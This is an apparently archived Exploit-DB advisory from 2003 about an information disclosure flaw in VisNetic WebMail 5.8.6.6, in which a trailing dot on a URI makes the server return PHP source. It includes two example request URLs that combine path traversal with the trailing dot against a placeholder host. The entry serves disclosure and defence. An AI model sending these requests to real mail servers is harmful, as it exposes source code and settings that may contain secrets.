VisNetic WebMail 5.8.6 .6 - Information Disclosure Vulnerability

2003-06-23T00:00:00
ID EDB-ID:22826
Type exploitdb
Reporter posidron
Modified 2003-06-23T00:00:00

Description

VisNetic WebMail 5.8.6 .6 Information Disclosure Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/8018/info

VisNetic WebMail is prone to an information disclosure vulnerability. Reportedly, by appending a dot '.' character to the end of a URI request to WebMail, the source code of PHP files may be returned in the web browser.

http://webmailhost:32000/mail/admin/../include.html.
http://webmailhost:32000/mail/admin/../settings.html.